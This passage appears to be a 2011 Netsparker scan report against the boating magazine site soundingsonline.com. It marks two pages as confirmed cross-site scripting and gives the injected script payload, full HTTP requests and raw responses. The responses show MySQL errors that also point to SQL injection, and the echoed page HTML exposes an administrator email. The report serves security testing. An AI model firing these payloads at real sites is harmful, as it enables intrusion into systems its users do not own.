<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&am..
- /news/sailing

/news/sailing CONFIRMED

http://www.soundingsonline.com/news/sailing?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00200F)</script>

Request

GET /news/sailing?'"--></style></script><script>netsparker(0x00200F)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200F)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200F)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/sailing" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>News of Sailing Championships, Tournaments, Races, Wins and Medals</title> <link href="/news/sailing?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/news/sailing?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_sail_scene m_sail_scene"><!--
Type of page: category<br />Section: 1, s_news<br />Category: 39, c_sail_scene<br />Menu: 88, m_sail_scene-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe&l..
- /boat-shop/tech-talk

/boat-shop/tech-talk CONFIRMED

http://www.soundingsonline.com/boat-shop/tech-talk?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002030)</script>

Request

GET /boat-shop/tech-talk?'"--></style></script><script>netsparker(0x002030)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002030)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002030)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/tech-talk" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating and Marine Industry Tech Talk</title> <link href="/boat-shop/tech-talk?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/tech-talk?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_uncategorized m_uncategorized"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 152, c_uncategorized<br />Menu: 152, m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of 